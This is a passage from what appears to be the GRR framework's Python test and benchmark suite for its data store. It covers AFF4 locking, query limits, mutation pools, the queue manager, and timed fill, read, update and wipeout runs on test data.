directory, standard.VFSDirectory, token=self.token).Close()
# We want the indexes to be written now.
data_store.DB.Flush()
# This must not raise.
aff4.FACTORY.Open(
"aff4:/C.1240/dir/a.b/c", standard.VFSDirectory, token=self.token)
index = data_store.DB.ResolvePrefix(
"aff4:/C.1240/dir", "index:dir/", token=self.token)
subjects = [s for (s, _, _) in index]
self.assertTrue("index:dir/b" in subjects)
self.assertTrue("index:dir/a.b" in subjects)
directory = aff4.FACTORY.Open("aff4:/C.1240/dir", token=self.token)
self.assertEqual(2, len(list(directory.OpenChildren())))
self.assertEqual(2, len(list(directory.ListChildren())))
OPEN_WITH_LOCK_NUM_THREADS = 10
OPEN_WITH_LOCK_TRIES_PER_THREAD = 3
OPEN_WITH_LOCK_SYNC_LOCK_SLEEP = 0.2
@test_lib.SetLabel("large")
@DBSubjectLockTest
def testAFF4OpenWithLock(self):
self.opened = False
self.client_urn = "aff4:/C.0000000000000001"
client = aff4.FACTORY.Create(
self.client_urn, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Set(
client.Schema.LEASED_UNTIL(rdfvalue.RDFDatetime().FromSecondsFromEpoch(
0)))
client.Close()
self.open_failures = 0
self.close_failures = 0
self.results = []
def ParallelThread():
for _ in xrange(self.OPEN_WITH_LOCK_TRIES_PER_THREAD):
t = time.time()
try:
with aff4.FACTORY.OpenWithLock(
self.client_urn,
token=self.token,
blocking=True,
blocking_sleep_interval=self.OPEN_WITH_LOCK_SYNC_LOCK_SLEEP,
blocking_lock_timeout=10):
# We fail if another thread has the object already opened here.
if self.opened:
self.open_failures += 1
self.fail("Double open!")
self.opened = True
logging.info("Thread %s holding lock for 0.5 seconds.",
thread.get_ident())
time.sleep(0.5)
# We fail if someone has closed the object while we are holding it
# opened.
if not self.opened:
self.close_failures += 1
self.fail("Double close!")
self.results.append(thread.get_ident())
self.opened = False
return
except aff4.LockError:
logging.info("Lock failed after %s seconds - retying.",
(time.time() - t))
threads = []
for _ in range(self.OPEN_WITH_LOCK_NUM_THREADS):
t = threading.Thread(target=ParallelThread)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(self.open_failures, 0)
self.assertEqual(self.close_failures, 0)
# Make sure all threads got it eventually.
self.assertEqual(len(self.results), self.OPEN_WITH_LOCK_NUM_THREADS)
def _ListedMultiResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.MultiResolvePrefix(*args, **kwargs))
def _ListedResolveMulti(self, *args, **kwargs):
return list(data_store.DB.ResolveMulti(*args, **kwargs))
def _ListedResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.ResolvePrefix(*args, **kwargs))
def _FlushedDeleteSubject(self, *args, **kwargs):
# DeleteSubject is not guaranteed to be synchronous. Make sure that
# we flush data store when testing it.
data_store.DB.DeleteSubject(*args, **kwargs)
data_store.DB.Flush()
def testLimits(self):
# Create 10 rows with 10 attributes each.
subjects = ["aff4:limittest_%d" % i for i in xrange(10)]
attributes = ["metadata:limittest_%d" % i for i in xrange(10)]
value_idx = 0
for subject in subjects:
for attribute in attributes:
value = "value_%d" % value_idx
value_idx += 1
data_store.DB.Set(subject, attribute, value, token=self.token)
# ResolvePrefix.
for limit in [1, 2, 5, 10, 100]:
results = data_store.DB.ResolvePrefix(
subjects[0], "metadata:", limit=limit, token=self.token)
self.assertEqual(len(results), min(limit, 10))
# MultiResolvePrefix.
for limit in [1, 2, 5, 9, 10, 11, 25, 100, 120]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:", limit=limit, token=self.token))
all_results = []
for subject_res in results.itervalues():
all_results.extend(subject_res)
self.assertEqual(len(all_results), min(limit, 100))
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:limittest_7", limit=limit, token=self.token))
all_results = []
for subject_res in results.itervalues():
all_results.extend(subject_res)
self.assertEqual(len(all_results), min(limit, 10))
# ResolveMulti.
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = list(
data_store.DB.ResolveMulti(
subjects[2], attributes, limit=limit, token=self.token))
self.assertEqual(len(results), min(limit, 10))
def testApi(self):
api = [
"DeleteAttributes", "MultiDeleteAttributes", "DeleteSubject",
"DeleteSubjects", "MultiResolvePrefix", "MultiSet", "Resolve",
"ResolveMulti", "ResolvePrefix", "ScanAttribute", "ScanAttributes",
"Set", "DBSubjectLock", "CreateNotifications", "DeleteNotifications",
"GetNotifications"
]
implementation = data_store.DB
reference = data_store.DataStore
for f in api:
implementation_spec = inspect.getargspec(getattr(implementation, f))
reference_spec = inspect.getargspec(getattr(reference, f))
self.assertEqual(implementation_spec, reference_spec,
"Signatures for function %s not matching: \n%s !=\n%s" %
(f, implementation_spec, reference_spec))
@DeletionTest
def testPoolDeleteSubjects(self):
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool = data_store.DB.GetMutationPool(token=self.token)
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
# Now it should be gone.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
def testPoolMultiSet(self):
pool = data_store.DB.GetMutationPool(token=self.token)
unicode_string = u"this is a uñîcödé string"
pool.MultiSet(self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
})
# Nothing is written before Flush() is called.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertIsNone(stored)
# Flush.
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
@DeletionTest
def testPoolDeleteAttributes(self):
predicate = "metadata:predicate"
pool = data_store.DB.GetMutationPool(token=self.token)
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
def testQueueManager(self):
session_id = rdfvalue.SessionID(flow_name="test")
client_id = rdf_client.ClientURN("C.1000000000000000")
request = rdf_flows.RequestState(
id=1,
client_id=client_id,
next_state="TestState",
session_id=session_id)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueRequest(request)
# We only have one unanswered request on the queue.
all_requests = list(manager.FetchRequestsAndResponses(session_id))
self.assertEqual(len(all_requests), 1)
self.assertEqual(all_requests[0], (request, []))
# FetchCompletedRequests should return nothing now.
self.assertEqual(list(manager.FetchCompletedRequests(session_id)), [])
# Now queue more requests and responses:
with queue_manager.QueueManager(token=self.token) as manager:
# Start with request 2 - leave request 1 un-responded to.
for request_id in range(2, 5):
request = rdf_flows.RequestState(
id=request_id,
client_id=client_id,
next_state="TestState",
session_id=session_id)
manager.QueueRequest(request)
response_id = None
for response_id in range(1, 10):
# Normal message.
manager.QueueResponse(
rdf_flows.GrrMessage(
session_id=session_id,
request_id=request_id,
response_id=response_id))
# And a status message.
manager.QueueResponse(
rdf_flows.GrrMessage(
session_id=session_id,
request_id=request_id,
response_id=response_id + 1,
type=rdf_flows.GrrMessage.Type.STATUS))
completed_requests = list(manager.FetchCompletedRequests(session_id))
self.assertEqual(len(completed_requests), 3)
# First completed message is request_id = 2 with 10 responses.
self.assertEqual(completed_requests[0][0].id, 2)
# Last message is the status message.
self.assertEqual(completed_requests[0][-1].type,
rdf_flows.GrrMessage.Type.STATUS)
self.assertEqual(completed_requests[0][-1].response_id, 10)
# Now fetch all the completed responses.
completed_response = list(manager.FetchCompletedResponses(session_id))
self.assertEqual(len(completed_response), 3)
for i, (request, responses) in enumerate(completed_response, 2):
self.assertEqual(request.id, i)
self.assertEqual(len(responses), 10)
# Now check if the limit is enforced. The limit refers to the total number
# of responses to return. We ask for maximum 15 responses, so we should get
# a single request with 10 responses (since 2 requests will exceed the
# limit).
more_data = False
i = 0
try:
partial_response = manager.FetchCompletedResponses(session_id, limit=15)
for i, (request, responses) in enumerate(partial_response, 2):
self.assertEqual(request.id, i)
self.assertEqual(len(responses), 10)
except queue_manager.MoreDataException:
more_data = True
# Returns the first request that is completed.
self.assertEqual(i, 3)
# Make sure the manager told us that more data is available.
self.assertTrue(more_data)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueNotification(
rdf_flows.GrrNotification(session_id=session_id, timestamp=100))
stored_notifications = manager.GetNotificationsForAllShards(
session_id.Queue())
self.assertEqual(len(stored_notifications), 1)
class DataStoreCSVBenchmarks(test_lib.MicroBenchmarks):
"""Long running benchmarks where the results are dumped to a CSV file.
These tests are deliberately not named with the test prefix, since they need
to be run individually to get true performance data. Run by specifying the
testname with --test and setting --labels=benchmark.
The CSV output filename will be printed in a log message at the end of the
test.
"""
labels = ["large"]
# What we consider as a big number of attributes.
BIG_NUM_ATTRIBUTES = 1000
units = "s"
# Database counters.
subjects = 0
predicates = 0
values = 0
queries_total = 0 # Total queries.
queries_last_timestep = 0 # Number of the queries up to the last timestep.
steps = 0 # How many steps so far.
query_interval = 3000 # A step is composed of this many queries.
test_name = "" # Current operation being run.
start_time = None
last_time = None
predicate_template = "task:flow%d"
def setUp(self):
super(DataStoreCSVBenchmarks, self).setUp(
["DB Size (KB)", "Queries", "Subjects", "Predicates",
"Values"], ["<20", "<10", "<10", "<10", "<10"])
self.InitDatastore()
self.start_time = time.time()
self.last_time = self.start_time
def tearDown(self):
self.Register(force=True)
super(DataStoreCSVBenchmarks, self).tearDown()
self.WriteCSV()
self.DestroyDatastore()
def Register(self, force=False):
"""Add a new result line to the benchmark result."""
self.queries_total += 1
if self.queries_total % self.query_interval == 0 or force:
data_store.DB.Flush()
this_time = time.time()
queries_diff = self.queries_total - self.queries_last_timestep
self.queries_last_timestep = self.queries_total
self.last_time = this_time
self.steps += 1
self.AddResult(self.test_name, this_time - self.start_time, self.steps,
data_store.DB.Size() / 1024, queries_diff, self.subjects,
self.predicates, self.values)
def WriteCSV(self, remove=False):
"""Write results to a CSV file."""
with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as fp:
writer = csv.writer(fp, delimiter=" ")
writer.writerow([
"Benchmark", "Time", "DBSize", "Queries", "Subjects", "Predicates",
"Values"
])
for row in self.scratchpad[2:]:
writer.writerow(
[row[0], row[1], row[3], row[4], row[5], row[6], row[7]])
logging.info("CSV File is in %s", fp.name)
if remove:
os.unlink(fp.name)
def _RandomlyReadSubject(self, subject, predicates):
"""Read certain parts of a given subject."""
for j, timestamps in predicates.items():
which = self.rand.randint(0, 2)
if which == 0:
# Read all timestamps.
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
elif which == 1:
# Read a specific timestamp.
if timestamps:
ts = self.rand.choice(timestamps)
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=(ts, ts),
token=self.token)
elif which == 2:
# Read latest.
data_store.DB.Resolve(
subject, self.predicate_template % j, token=self.token)
self.Register()
which = self.rand.randint(0, 1)
if which == 0:
# Find all attributes.
data_store.DB.ResolvePrefix(
subject,
"task:flow",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
elif which == 1:
# Find all attributes with a prefix-reducible regex.
data_store.DB.ResolvePrefix(
subject,
"task:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
self.Register()
def _ReadRandom(self, subjects, fraction, change_test=True):
"""Randomly read the database."""
if change_test:
self.test_name = "read random %d%%" % fraction
for _ in range(0, int(float(len(subjects)) * float(fraction) / 100.0)):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _UpdateRandom(self, subjects, fraction, change_test=True):
"""Update values/predicates for a given fraction of the subjects."""
if change_test:
self.test_name = "update %d%%" % fraction
new_value = os.urandom(100)
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
if self.rand.randint(0, 100) > fraction:
continue
which = self.rand.randint(0, 2)
if which == 0 or which == 1:
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
if which == 0 and len(timestamp_info):
# Update one timestamp'ed value.
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
timestamp=timestamp_info[-1],
token=self.token)
self.Register()
elif which == 1:
# Add another timestamp.
timestamp_info.append(100 * number_timestamps + 1)
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
replace=False,
timestamp=timestamp_info[-1],
token=self.token)
self.values += 1
self.Register()
elif which == 2:
# Add an extra predicate.
j = len(predicates)
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
self.values += number_timestamps
self.predicates += 1
values = [(new_value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
token=self.token)
self.Register()
data_store.DB.Flush()
def _DeleteRandom(self, subjects, fraction, change_test=True):
"""Delete predicates/subjects/values at random."""
if change_test:
self.test_name = "delete %d%%" % fraction
subjects_to_delete = []
for i, info in subjects.items():
subject = info["name"]
predicates = info["attrs"]
number_predicates = len(predicates)
do_it = (self.rand.randint(0, 100) <= fraction)
which = self.rand.randint(0, 2)
count_values = 0
predicates_to_delete = []
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
count_values += number_timestamps
if do_it:
if which == 0:
# Delete one timestamp'ed value.
if timestamp_info:
ts = timestamp_info[0]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
start=ts,
end=ts,
token=self.token)
self.values -= 1
timestamp_info.pop(0)
self.Register()
else:
which = 1
if which == 1:
# Delete the attribute itself.
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j], token=self.token)
self.values -= number_timestamps
self.predicates -= 1
predicates_to_delete.append(j)
self.Register()
if do_it and which == 1:
for j in predicates_to_delete:
del predicates[j]
if do_it and which == 2:
# Delete subject.
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
subjects_to_delete.append(i)
self.Register()
for i in subjects_to_delete:
del subjects[i]
data_store.DB.Flush()
def _GrowRandomly(self, subjects, fraction, nclients, change_test=True):
"""Adds new clients/subjects to the database."""
if change_test:
self.test_name = "add %d%%" % fraction
how_many = int(float(len(subjects)) * float(fraction) / 100)
new_value = os.urandom(100)
new_subject = max(subjects.iteritems(), key=operator.itemgetter(0))[0] + 1
# Generate client names.
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in xrange(new_subject, new_subject + how_many):
client = clients[self.rand.randint(0, nclients - 1)]
self._AddNewSubject(client, subjects, i, new_value)
data_store.DB.Flush()
def _GenerateRandomSubject(self):
n = self.rand.randint(1, 5)
seps = [
self._GenerateRandomString(self.rand.randint(5, 10)) for _ in xrange(n)
]
return "/".join(seps)
def _AddNewSubject(self, client, subjects, i, value, max_attributes=3):
"""Add a new subject to the database."""
number_predicates = self.rand.randrange(1, max_attributes)
self.subjects += 1
predicates = dict.fromkeys(xrange(number_predicates))
self.predicates += number_predicates
subject = str(client.Add(self._GenerateRandomSubject()))
for j in xrange(number_predicates):
number_timestamps = self.rand.randrange(1, 3)
self.values += number_timestamps
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
values = [(value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
timestamp=100,
replace=False,
sync=False,
token=self.token)
self.Register()
info = {"name": subject, "attrs": predicates}
subjects[i] = info
def _ReadLinear(self, subjects, fraction):
"""Linearly read subjects from the database."""
self.test_name = "read linear %d%%" % fraction
for i in subjects:
if self.rand.randint(0, 100) > fraction:
return
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _AddManyAttributes(self, subjects, many):
"""Add lots of predicates to a given number of subjects."""
self.test_name = "add +attrs %d" % many
new_value = os.urandom(100)
for _ in range(0, many):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
how_many = self.rand.randint(self.BIG_NUM_ATTRIBUTES,
self.BIG_NUM_ATTRIBUTES + 1000)
self.predicates += how_many
new_predicate = max(
predicates.iteritems(), key=operator.itemgetter(0))[0] + 1
for j in xrange(new_predicate, new_predicate + how_many):
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
self.values += number_timestamps
values = [(new_value, t) for t in ts]
predicates[j] = ts
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _RemoveManyAttributes(self, subjects, fraction):
"""Delete all predicates (except 1) from subjects with many predicates."""
self.test_name = "del +attrs %d%%" % fraction
often = 100 / fraction
count = 0
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
if number_predicates >= self.BIG_NUM_ATTRIBUTES:
count += 1
if count == often:
count = 0
predicates_to_delete = [j for j in predicates.keys()[1:]]
values_deleted = sum(len(predicates[x]) for x in predicates_to_delete)
self.values -= values_deleted
self.predicates -= len(predicates_to_delete)
for j in predicates_to_delete:
del predicates[j]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _Wipeout(self, subjects):
"""Delete every subject from the database."""
self.test_name = "wipeout"
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
count_values = 0
for j in predicates:
count_values += len(predicates[j])
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
self.Register()
subjects = {}
data_store.DB.Flush()
def _DoMix(self, subjects):
"""Do a mix of database operations."""
self.test_name = "mix"
for _ in xrange(0, len(subjects) / 2000):
# Do random operations.
op = self.rand.randint(0, 3)
if op == 0:
self._ReadRandom(subjects, 14, False)
elif op == 1:
self._GrowRandomly(subjects, 5, 20, False)
elif op == 2:
self._UpdateRandom(subjects, 10, False)
elif op == 3:
self._DeleteRandom(subjects, 4, False)
def _GenerateRandomClient(self):
return rdf_client.ClientURN("C.%016d" % self.rand.randint(0, (10**16) - 1))
def _FillDatabase(self, nsubjects, nclients, max_attributes=3):
"""Fill the database with a certain number of subjects and clients."""
self.rand = random.Random(0)
self.test_name = "fill"
self.AddResult(self.test_name, 0, self.steps,
data_store.DB.Size(), 0, 0, 0, 0)
subjects = dict.fromkeys(xrange(nsubjects))
value = os.urandom(100)
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in subjects:
client = self.rand.choice(clients)
self._AddNewSubject(client, subjects, i, value, max_attributes)
data_store.DB.Flush()
return subjects
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
def _AddBlobs(self, howmany, size):
"""Adds 'howmany' blobs with size 'size' kbs."""
self.test_name = "add blobs %dx%dk" % (howmany, size)
count = 0
often = howmany / 10
for count in xrange(howmany):
data = self._GenerateRandomString(1024 * size)
data_store.DB.StoreBlob(data, token=self.token)
if count % often == 0:
# Because adding blobs takes too long, we force the output of
# new results.
self.Register(force=True)
self.Register(force=True)
data_store.DB.Flush()
@test_lib.SetLabel("benchmark")
def manySubjectsFewAttrs(self):
"""Database with many subjects with few attributes."""
subjects = self._FillDatabase(25000, 500)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 70)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 100)
self._DoMix(subjects)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def manySubjectsFewWithManyAttrs(self):
"""Database where a few subjects have many attributes."""
subjects = self._FillDatabase(25000, 500)
self._UpdateRandom(subjects, 50)
self._AddManyAttributes(subjects, 100)
self._ReadRandom(subjects, 30)
# For 1/2 of the subjects with many attributes, remove all but
# one of the attributes.
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._UpdateRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def fewSubjectsManyAttrs(self):
"""Database with a few subjects with many attributes."""
subjects = self._FillDatabase(100, 5)
self._UpdateRandom(subjects, 100)
self._AddManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def blobs(self):
"""Database that stores blobs of increasing size."""
subjects = self._FillDatabase(10000, 200)
def _ReadUpdate():
self._ReadRandom(subjects, 75)
self._UpdateRandom(subjects, 20)
_ReadUpdate()
self._AddBlobs(50, 512)
_ReadUpdate()
self._AddBlobs(50, 2048)
_ReadUpdate()
self._AddBlobs(50, 10240)
_ReadUpdate()
self._AddBlobs(20, 10240 * 10)
_ReadUpdate()
@test_lib.SetLabel("benchmark")
def manySubjectsManyAttrs(self):
"""Database with many subjects with many attributes."""
subjects = self._FillDatabase(25000, 500, 50)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 50)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 50)
self._DoMix(subjects)
self._Wipeout(subjects)
class DataStoreBenchmarks(test_lib.MicroBenchmarks):
"""Datastore micro benchmarks.
These tests should be run with --labels=benchmark
"""
queue = rdfvalue.RDFURN("BENCHMARK")
units = "s"
labels = ["large"]
def setUp(self):
super(DataStoreBenchmarks, self).setUp()
self.InitDatastore()
self.tp = threadpool.ThreadPool.Factory("test_pool", 50)
self.tp.Start()
def tearDown(self):
super(DataStoreBenchmarks, self).tearDown()
self.tp.Stop()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def GenerateFiles(self, client_id, n, directory="dir/dir"):
res = []
for i in xrange(n):
res.append(
rdf_client.StatEntry(
aff4path="aff4:/%s/fs/os/%s/file%d" % (client_id, directory, i),
st_mode=33261,
st_ino=1026267,
st_dev=51713,
st_nlink=1,
st_uid=0,
st_gid=0,
st_size=60064,
st_atime=1308964274,
st_mtime=1285093975,
st_ctime=1299502221,
st_blocks=128,
st_blksize=4096,
st_rdev=0,
pathspec=rdf_paths.PathSpec(
path="/dir/dir/file%d" % i, pathtype=0)))
return res
def StartFlow(self, client_id):
flow_id = flow.GRRFlow.StartFlow(
client_id=client_id,
flow_name=filesystem.ListDirectory.__name__,
queue=self.queue,
pathspec=rdf_paths.PathSpec(
path="/",
pathtype="OS",),
token=self.token)
self.flow_ids.append(flow_id)
messages = []
for d in range(self.nr_dirs):
messages += self.GenerateFiles(client_id, self.files_per_dir,
"dir/dir%d" % d)
messages.append(rdf_flows.GrrStatus())
with queue_manager.QueueManager(token=self.token) as flow_manager:
for i, payload in enumerate(messages):
msg = rdf_flows.GrrMessage(
session_id=flow_id,
request_id=1,
response_id=1 + i,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
payload=payload)
if isinstance(payload, rdf_flows.GrrStatus):
msg.type = 1
flow_manager.QueueResponse(msg)
nr_clients = 4
nr_dirs = 4
files_per_dir = 500
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
# Constants to control the size of testCollections. These numbers run in a
# reasonable amount of time for a unit test [O(20s)] on most data stores.
RECORDS = 5000
RECORD_SIZE = 1000
READ_COUNT = 50
BIG_READ_SIZE = 25
# The sequential collection index is only computed for records at least 5m old,
# so we write records this far in the past in order to force index creation.
INDEX_DELAY = rdfvalue.Duration("10m")
@test_lib.SetLabel("benchmark")
def testCollections(self):
self.rand = random.Random(42)
#
# Populate and exercise an indexed sequential collection.
#
indexed_collection = aff4.FACTORY.Create(
"aff4:/test_seq_collection",
StringSequentialCollection,
mode="rw",
token=self.token)
start_time = time.time()
for _ in range(self.RECORDS):
indexed_collection.Add(
rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
timestamp=rdfvalue.RDFDatetime.Now() - self.INDEX_DELAY)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Add (size %d)" % self.RECORD_SIZE, elapsed_time,
self.RECORDS)
start_time = time.time()
self.assertEqual(len(indexed_collection), self.RECORDS)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Read to end", elapsed_time, 1)
start_time = time.time()
for _ in range(self.READ_COUNT):
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - 1)):
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random 1 record reads", elapsed_time,
self.READ_COUNT)
start_time = time.time()
for _ in range(self.READ_COUNT):
count = 0
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - self.BIG_READ_SIZE)):
count += 1
if count >= self.BIG_READ_SIZE:
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random %d record reads" % self.BIG_READ_SIZE,
elapsed_time, self.READ_COUNT)
start_time = time.time()
for _ in indexed_collection.GenerateItems():
pass
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. full sequential read", elapsed_time, 1)
@test_lib.SetLabel("benchmark")
def testSimulateFlows(self):
self.flow_ids = []
self.units = "s"
client_ids = ["C.%016X" % j for j in range(1, self.nr_clients + 1)]
start_time = time.time()
for client_id in client_ids:
self.tp.AddTask(self.StartFlow, (client_id,))
self.tp.Join()
notifications = [
rdf_flows.GrrNotification(session_id=f) for f in self.flow_ids
]
with queue_manager.QueueManager(token=self.token) as manager:
manager.MultiNotifyQueue(notifications)
time_used = time.time() - start_time
self.AddResult("Generate Messages (%d clients, %d files)" %
(self.nr_clients,
self.nr_dirs * self.files_per_dir), time_used, 1)
my_worker = worker.GRRWorker(queues=[self.queue], token=self.token)
start_time = time.time()
while my_worker.RunOnce():
pass
my_worker.thread_pool.Join()
time_used = time.time() - start_time
self.AddResult("Process Messages", time_used, 1)
@test_lib.SetLabel("benchmark")
def testMicroBenchmarks(self):
# Tests run in arbitrary order but for the benchmarks, the order makes a
# difference so we call them all from one test here.
self.n = 1000
self.small_n = self.n / 100
self.units = "ms"
self.BenchmarkWriting()
self.BenchmarkReading()
self.BenchmarkWritingThreaded()
self.BenchmarkReadingThreaded()
self.BenchmarkAFF4Locks()
def BenchmarkWriting(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
subject_template % i, "task:flow", value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow", predicate_template % i, value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow",
"task:someflow",
value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set versions", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.Set(
"aff4:/largerow%d" % i,
"task:largeflow",
large_value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkReading(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(subject_template % i, "task:flow", token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(
"aff4:/somerow", predicate_template % i, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.ResolvePrefix(
"aff4:/somerow",
"task:someflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get all versions", (end_time - start_time) / self.small_n,
self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
res = data_store.DB.ResolvePrefix(
"aff4:/largerow%d" % i,
"task:largeflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(res), 1)
self.assertEqual(len(res[0][1]), 10 * 1024 * 1024)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkWritingThreaded(self):
subject_template = "aff4:/threadedrow%d"
